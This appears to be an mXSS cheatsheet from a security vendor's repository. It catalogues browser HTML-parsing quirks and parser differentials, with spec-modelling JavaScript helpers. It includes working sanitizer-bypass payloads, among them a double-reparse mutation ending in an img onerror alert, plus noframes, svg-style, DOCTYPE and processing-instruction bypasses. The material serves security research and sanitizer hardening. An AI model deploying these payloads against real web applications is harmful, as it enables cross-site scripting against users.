mXSS cheatsheet 🧬🔬

This cheatsheet is your one-stop shop for diving deep into the fascinating world of mXSS (mutation XSS: markup mutations caused by browser quirks in HTML parsing). Forget sifting through the ~1,500-page official spec: here’s a curated list of examples that showcase these unexpected behaviors.

What’s in it for you?

If you would like to know more on this topic, you can visit:

Contributing

Contributions to this list are very welcome. Feel free to open issues on the repository if you would like to see more information on a specific topic, or a pull request if you are already aware of additional information. Links to public write-ups are appreciated when adding info.

The project is maintained by the Sonar R&D team. Find XSS in your code (and much more) with SonarCloud, free for open-source projects!

HTML namespace

select

  • Unwanted elements inside select are removed: <select><a> → <select>
  • Exceptions are <select>, <input>, <keygen> and <textarea>, which close the open select instead: <select><style><input><a> → <select></select><input><a></a>

form

  • Cannot have other form descendants: <form id=form1>INSIDE_FORM1<form id=form2>INSIDE_FORM2 → <form id="form1">INSIDE_FORM1 INSIDE_FORM2</form>
  • Bypass: <form id="outer"><div></form><form id="inner"><input> → <form id="outer"><div><form id="inner"><input></form></div></form> → <form id="outer"><div><input></div></form>
  • Can craft payloads that will mutate even after the second reparsing: <form id="outer"><math><mtext></form><form id="inner"><mglyph><svg><mtext><form id="outer"><mi></form><form id="inner"><mglyph><desc><xmp><img src=x onerror=alert(1)>
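The multi-stage outputs above come from serializing and reparsing in a loop. A minimal sketch for reproducing them, assuming a browser (it relies on DOMParser and body.innerHTML, which plain Node.js does not provide); traceMutations and domParserRoundtrip are hypothetical helper names, and the roundtrip function is a parameter so the loop itself can be exercised without a DOM.

```javascript
// Browser-only (assumption): parse html as a full document, serialize the body back.
function domParserRoundtrip(html) {
  const doc = new DOMParser().parseFromString(html, "text/html");
  return doc.body.innerHTML;
}

// Apply `roundtrip` repeatedly until the output stops changing or maxRounds is hit.
// The first round usually just normalizes the raw input (e.g. adds end tags);
// output that keeps changing after that is the interesting mXSS signal.
function traceMutations(html, roundtrip = domParserRoundtrip, maxRounds = 5) {
  const steps = [html];
  let current = html;
  for (let i = 0; i < maxRounds; i++) {
    const next = roundtrip(current);
    if (next === current) {
      return { steps, stable: true }; // fixed point reached
    }
    steps.push(next);
    current = next;
  }
  return { steps, stable: false }; // still mutating after maxRounds
}
```

In a browser console, traceMutations('<form id="outer"><div></form><form id="inner"><input>').steps should list the stages shown in the Bypass bullet above.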

table

  • Disallowed elements are moved before the table (foster parenting): <table><a> → <a></a><table></table>
  • Can be used to enclose disallowed elements in one another
    • <p><table><xmp> → <p><xmp></xmp><table></table></p> → <p></p><xmp></xmp><table></table>
    • <a><mglyph><table><a> → <a><mglyph><a></a><table></table></mglyph></a> → <a><mglyph></mglyph><a></a><table></table></a>
    • <p><table><ul> → <p><ul></ul><table></table></p> → <p></p><ul></ul><table></table><p></p>
    • And more…
  • Table elements such as tbody, tr, and td are dropped when they appear outside of a table
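Which start tags get foster-parented can be sketched as a small predicate. This is a simplified reading of the HTML Standard’s “in table” insertion mode, assuming the current node is the table (or tbody, thead, tfoot, tr); isFosterParented and HANDLED_IN_TABLE are hypothetical names, and text and end tags are not covered.

```javascript
// Start tags the "in table" insertion mode handles itself; every other start tag
// is foster-parented, i.e. inserted before the table instead of inside it.
const HANDLED_IN_TABLE = new Set([
  "caption", "colgroup", "col", "tbody", "tfoot", "thead",
  "td", "th", "tr", "table", "style", "script", "template", "form",
]);

// Assumption: only start tags, parsed while the current node is a table-ish element.
function isFosterParented(tagName, attrs = {}) {
  const name = tagName.toLowerCase();
  if (name === "input") {
    // <input type=hidden> stays in the table; any other input is moved out.
    return String(attrs.type ?? "").toLowerCase() !== "hidden";
  }
  return !HANDLED_IN_TABLE.has(name);
}
```

This is why <table><xmp> or <table><a> end up as siblings placed before the table in the examples above.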

a

  • Cannot be the child of another a element. Bypass via table element: <a id=1><table><a id=2> → <a id="1"><a id="2"></a><table></table></a> → <a id="1"></a><a id="2"></a><table></table>
  • Another bypass: <a id=1><audio>aa<altglyphdef><animatecolor><filter><fieldset><a id=2></fieldset></a>

headings

  • Headings cannot be direct children of other headings, e.g. <h1><h2> → <h1></h1><h2></h2>
  • Bypass: <h1><a><h2></a> → <h1><a></a><h2><a></a></h2></h1> → <h1><a></a></h1><h2><a></a></h2>

noscript

  • Parsed differently depending on whether scripting is enabled. DOMParser parses with scripting disabled
  • Scripting enabled: <noscript><a> → <noscript><a></noscript>
  • Scripting disabled: <noscript><a> → <noscript><a></a></noscript>

br and p

  • Are the only elements that can be created from a lone end tag: </p> → <p></p>, </br> → <br>
  • Start tags that close an open p element include: address, article, aside, blockquote, center, details, dialog, dir, div, dl, fieldset, figcaption, figure, footer, header, hgroup, main, menu, nav, ol, p, search, section, summary, ul, pre, listing, plaintext

plaintext

  • plaintext can’t be closed in the HTML namespace, yet <table><plaintext><a> → <plaintext><a></plaintext><table></table>: foster parenting moves plaintext before the table, so the table element still ends up after it

textarea

  • Character references in the content are decoded
  • Comments are not parsed inside textarea: <textarea><!--test--> → <textarea>&lt;!--test--&gt;</textarea>
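The &lt; and &gt; in the textarea output come from how text nodes are written back to markup. A minimal sketch of that rule from the HTML fragment serialization algorithm, assuming the parent is an HTML-namespace element; serializeTextNode and RAW_TEXT_PARENTS are hypothetical names.

```javascript
// Parents whose text children are serialized verbatim (no escaping).
// noscript only counts when scripting is enabled.
const RAW_TEXT_PARENTS = new Set([
  "style", "script", "xmp", "iframe", "noembed", "noframes", "plaintext",
]);

// Assumption: parentName is the local name of an HTML-namespace parent element.
function serializeTextNode(text, parentName, scriptingEnabled = true) {
  if (RAW_TEXT_PARENTS.has(parentName) || (parentName === "noscript" && scriptingEnabled)) {
    return text; // written back exactly as-is
  }
  // Everything else (textarea included) is escaped; "&" must go first.
  return text
    .replace(/&/g, "&amp;")
    .replace(/\u00a0/g, "&nbsp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}
```

The same rule explains the noscript (scripting enabled) and plaintext outputs above: their text is written back verbatim.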

Active formatting elements

  • List of elements: a, b, big, code, em, font, i, nobr, s, small, strike, strong, tt, and u
  • Active formatting elements might get duplicated during parsing roundtrips when the DOM tree changes (see “the list of active formatting elements” in the HTML Standard)
  • For example: <li><a><table><li>t → <li><a><li>t</li><table></table></a></li> → <li><a></a></li><li><a>t</a></li><table></table>

NULL byte

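  • Is replaced with U+FFFD (code point 65533) in an element name
    const doc = new DOMParser().parseFromString(`<a\x00 id="test">`, "text/html");
    // The NULL byte in the tag name becomes U+FFFD, so the element is "a\uFFFD", not "a"
    doc.querySelector("#test").tagName.slice(1).charCodeAt(0) === 65533;
    >>> true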
    

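The renaming happens in the tokenizer’s tag name state. A sketch of that per-character rule, assuming raw holds only the characters of the tag name (normalizeTagName is a hypothetical helper, not a browser API):

```javascript
// Tag name state (HTML Standard), character handling only:
// ASCII upper-case letters are lowered, U+0000 NULL becomes U+FFFD.
// Assumption: `raw` excludes the leading "<" and stops before whitespace, "/" or ">".
function normalizeTagName(raw) {
  let name = "";
  for (const ch of raw) {
    if (ch >= "A" && ch <= "Z") {
      name += ch.toLowerCase();
    } else if (ch === "\u0000") {
      name += "\uFFFD";
    } else {
      name += ch;
    }
  }
  return name;
}
```

Because the resulting name is "a\uFFFD", the parsed element is not an a element.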

SVG namespace

HTML integration points

  • foreignObject, desc, and title elements

image element

  • image is allowed in SVG, but in the HTML namespace the parser renames it to img, which is a foreign content breaker


MATHML namespace

MathML text integration points

  • mi, mo, mn, ms, and mtext elements

annotation-xml element

  • Can embed the SVG namespace in MathML only as a direct child of annotation-xml or inside an HTML integration point: <math><annotation-xml><svg> works, but <math><annotation-xml><x><svg> does not
  • Becomes an HTML integration point if its encoding attribute is text/html or application/xhtml+xml (ASCII case-insensitive)

mglyph/malignmark elements

  • If an mglyph or malignmark element is a direct child of a MathML text integration point (mi, mo, mn, ms, mtext), the element (and its descendants) stays in the MathML namespace
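The integration point rules above can be combined into a simplified version of the tree-construction dispatcher for start tags. This is a sketch only: node objects shaped like { namespace, localName, attrs } are an assumption, all function names are hypothetical, and usesHtmlRules returning false means the foreign content rules apply (which can still break out for the tags listed under Foreign content breakers).

```javascript
const HTML_NS = "http://www.w3.org/1999/xhtml";
const SVG_NS = "http://www.w3.org/2000/svg";
const MATHML_NS = "http://www.w3.org/1998/Math/MathML";

function isMathMLTextIntegrationPoint(node) {
  return node.namespace === MATHML_NS && ["mi", "mo", "mn", "ms", "mtext"].includes(node.localName);
}

// SVG foreignObject/desc/title, and annotation-xml with an HTML encoding.
function isHtmlIntegrationPoint(node) {
  if (node.namespace === SVG_NS) {
    return ["foreignObject", "desc", "title"].includes(node.localName);
  }
  if (node.namespace === MATHML_NS && node.localName === "annotation-xml") {
    const encoding = String(node.attrs?.encoding ?? "").toLowerCase();
    return encoding === "text/html" || encoding === "application/xhtml+xml";
  }
  return false;
}

// `node` is the adjusted current node; `tagName` is the incoming start tag.
function usesHtmlRules(node, tagName) {
  if (node.namespace === HTML_NS) return true;
  if (isMathMLTextIntegrationPoint(node) && tagName !== "mglyph" && tagName !== "malignmark") {
    return true; // mglyph/malignmark stay MathML here
  }
  if (node.namespace === MATHML_NS && node.localName === "annotation-xml" && tagName === "svg") {
    return true; // svg as a direct child of annotation-xml
  }
  return isHtmlIntegrationPoint(node);
}
```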


Foreign content breakers

The following tags

  • b, big, blockquote, body, br, center, code, dd, div, dl, dt, em, embed, h1, h2, h3, h4, h5, h6, head, hr, i, img, li, listing, menu, meta, nobr, ol, p, pre, ruby, s, small, span, strong, strike, sub, sup, table, tt, u, ul, var

The font element

  • Breaks foreign content only when it has a color, face, or size attribute

The head and body element

  • Are also foreign content breakers, and the tags themselves are dropped when parsed inside the body, e.g.: <svg><body><a> → <svg></svg><a></a>
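The breaker rules in this section fit in a small lookup. A sketch, where breaksForeignContent and FOREIGN_CONTENT_BREAKERS are hypothetical names; it covers start tags only, while the spec also treats the end tags </br> and </p> as breakers.

```javascript
// Start tags that make the parser leave SVG/MathML foreign content.
const FOREIGN_CONTENT_BREAKERS = new Set([
  "b", "big", "blockquote", "body", "br", "center", "code", "dd", "div", "dl", "dt",
  "em", "embed", "h1", "h2", "h3", "h4", "h5", "h6", "head", "hr", "i", "img", "li",
  "listing", "menu", "meta", "nobr", "ol", "p", "pre", "ruby", "s", "small", "span",
  "strong", "strike", "sub", "sup", "table", "tt", "u", "ul", "var",
]);

// font only breaks out when it carries a color, face or size attribute.
function breaksForeignContent(tagName, attrNames = []) {
  const name = tagName.toLowerCase();
  if (name === "font") {
    return attrNames.some((a) => ["color", "face", "size"].includes(a.toLowerCase()));
  }
  return FOREIGN_CONTENT_BREAKERS.has(name);
}
```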


Browser specific

Document fragment parsing

  • JavaScript APIs that use fragment parsing: innerHTML, insertAdjacentHTML, etc.
  • Non-fragment parsing examples: an iframe’s srcdoc, regular document rendering
  • Firefox: <svg><div> → <svg><div></div></svg> (this applies to all foreign content breakers, not only div)
  • Other browsers: <svg><div> → <svg></svg><div></div> (as expected)


HTML5 vs HTML4 / XML

RCDATA/RAWTEXT elements

  • HTML introduced RCDATA/RAWTEXT elements, whose content is not parsed as markup. If the sanitizer uses an XML-style parser, which does not know about them, an attacker can bypass sanitization with a payload such as <noframes><style></noframes><xss></style></noframes>
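The differential comes from the tokenizer state the HTML parser enters after each start tag, while an XML-style parser always keeps parsing markup. A sketch of the HTML side, assuming the element is in the HTML namespace (in SVG/MathML these are ordinary elements); contentStateFor and its state labels are hypothetical names loosely following the spec’s tokenizer states.

```javascript
// Tokenizer state entered after an HTML-namespace start tag.
// scriptingEnabled only matters for noscript (DOMParser parses with scripting disabled).
function contentStateFor(tagName, scriptingEnabled = true) {
  switch (tagName.toLowerCase()) {
    case "title":
    case "textarea":
      return "RCDATA"; // text only, character references decoded
    case "style":
    case "xmp":
    case "iframe":
    case "noembed":
    case "noframes":
      return "RAWTEXT"; // text only, no decoding
    case "noscript":
      return scriptingEnabled ? "RAWTEXT" : "DATA";
    case "script":
      return "SCRIPT_DATA";
    case "plaintext":
      return "PLAINTEXT"; // the tokenizer never leaves this state
    default:
      return "DATA"; // normal markup parsing
  }
}
```

For the payload above, noframes puts the HTML tokenizer into RAWTEXT, so <style> is plain text and the first </noframes> ends it, leaving <xss> as a real element.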

Comments

  • According to the XML specification (XHTML), comments must end with the characters -->. The HTML specification, on the other hand, states that a comment’s text “must not start with the string >, nor start with the string ->”, and the HTML5 parser closes such a comment immediately.
    Input: <!--><p>
    HTML5 output: <!----><p></p>
    HTML4 output: <!--><p>-->
    

    This can be done with either <!--> or <!--->.
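The two comment-ending rules can be compared directly. A simplified sketch that ignores EOF handling; htmlCommentEnd and xmlCommentEnd are hypothetical helpers returning the index just past the comment that starts at `start`, or -1 if it never ends.

```javascript
// HTML5: "<!-->" and "<!--->" close at once; otherwise "-->" or "--!>" ends the comment.
function htmlCommentEnd(input, start) {
  const s = start + 4; // first character after "<!--"
  if (input[s] === ">") return s + 1;
  if (input.startsWith("->", s)) return s + 2;
  const hits = [input.indexOf("-->", s), input.indexOf("--!>", s)].filter((i) => i !== -1);
  if (hits.length === 0) return -1;
  const i = Math.min(...hits);
  return input.startsWith("-->", i) ? i + 3 : i + 4;
}

// XML: the comment runs until the first "-->" after "<!--", with no short forms.
function xmlCommentEnd(input, start) {
  const i = input.indexOf("-->", start + 4);
  return i === -1 ? -1 : i + 3;
}
```

For <!--><p>-->, the HTML rule ends the comment right after <!--> so <p> becomes an element, while the XML rule treats everything up to the final --> as comment text.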

Foreign content elements

  • HTML5 introduced two foreign elements (math and svg) whose content follows different parsing rules than HTML. PHP’s HTML4-style parser doesn’t take this into account, causing further parsing differentials and sanitizer bypasses such as: <svg><p><style><!--</style><xss>--></style>

DOCTYPE element

  • The !DOCTYPE declaration in XML/XHTML is more complex than in HTML5, allowing more characters and nested markup declarations. In contrast, the HTML doctype ends at the first occurrence of the “greater than” sign >, even inside a quoted identifier. The following payloads can be used if the parser doesn’t follow HTML5’s DOCTYPE rules:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTDHTML4.01//EN" "><xss>">
    <!DOCTYPE HTML SYSTEM "><xss>">
    
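Both payloads depend on where the declaration ends. A sketch of the two rules; htmlDoctypeEnd and xmlDoctypeEnd are hypothetical helpers, and the XML side is simplified to quoted literals only (no internal subset in [...]).

```javascript
// HTML5: a DOCTYPE ends at the first ">", even inside a quoted identifier
// (the tokenizer reports an "abrupt" parse error and stops there).
function htmlDoctypeEnd(input, start) {
  const i = input.indexOf(">", start);
  return i === -1 ? -1 : i + 1;
}

// Simplified XML-style rule: ">" inside a quoted literal does not end the declaration.
function xmlDoctypeEnd(input, start) {
  let quote = null;
  for (let i = start; i < input.length; i++) {
    const ch = input[i];
    if (quote) {
      if (ch === quote) quote = null; // closing quote
    } else if (ch === '"' || ch === "'") {
      quote = ch; // opening quote
    } else if (ch === ">") {
      return i + 1;
    }
  }
  return -1;
}
```

With <!DOCTYPE HTML SYSTEM "><xss>">, the HTML rule leaves <xss>"> to be parsed as markup, while the XML-style rule consumes the whole line as the declaration.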

Element name starting with underscore

  • According to the XML specification, “Element names must start with a letter or underscore”, unlike HTML, where a tag name must start with an ASCII letter.
    Input: <p><_test>/<p>
    HTML output: <p>&lt;_test/&gt;/<p>
    XML output: <p><_test/>/<p>
    
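The difference boils down to which character may follow <. A sketch for start tags only; htmlTreatsAsTag and xmlTreatsAsTag are hypothetical helpers, and the XML check is simplified to ASCII (the real NameStartChar production also allows many non-ASCII ranges).

```javascript
// HTML tokenizer "tag open" state: only an ASCII letter starts a start-tag name;
// anything else ("_", digits, ...) turns the "<" into plain text.
function htmlTreatsAsTag(markup) {
  return markup[0] === "<" && /^[A-Za-z]$/.test(markup[1] ?? "");
}

// XML, simplified to ASCII: a name may start with a letter, "_" or ":".
function xmlTreatsAsTag(markup) {
  return markup[0] === "<" && /^[A-Za-z_:]$/.test(markup[1] ?? "");
}
```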

Processing instruction

  • XML supports processing instructions (PIs), while the HTML parser turns <? into a bogus comment that ends at the first >. If the sanitizer accepts PIs, the following payload can be used: <?x --><xss> ?>
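Where each parser stops explains the payload. A sketch of both rules; htmlBogusCommentEnd and xmlPiEnd are hypothetical helpers returning the index just past the construct that starts at `start`, or -1 if it is unterminated.

```javascript
// HTML5: "<?" starts a bogus comment that ends at the first ">".
function htmlBogusCommentEnd(input, start) {
  const i = input.indexOf(">", start + 2);
  return i === -1 ? -1 : i + 1;
}

// XML: a processing instruction runs until the first "?>".
function xmlPiEnd(input, start) {
  const i = input.indexOf("?>", start + 2);
  return i === -1 ? -1 : i + 2;
}
```

For <?x --><xss> ?>, the XML side sees one harmless PI, while the HTML parser closes the bogus comment after <?x --> and then creates an xss element.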


Entities decoding

In the content of noscript

In the content of style, but only in the SVG and MathML namespaces


Documentation links

Integration points: HTML Standard

Breaking foreign content tags: HTML Standard

RCDATA/RAWTEXT elements: HTML Standard

Serializing HTML fragments: HTML Standard

Element types: HTML Standard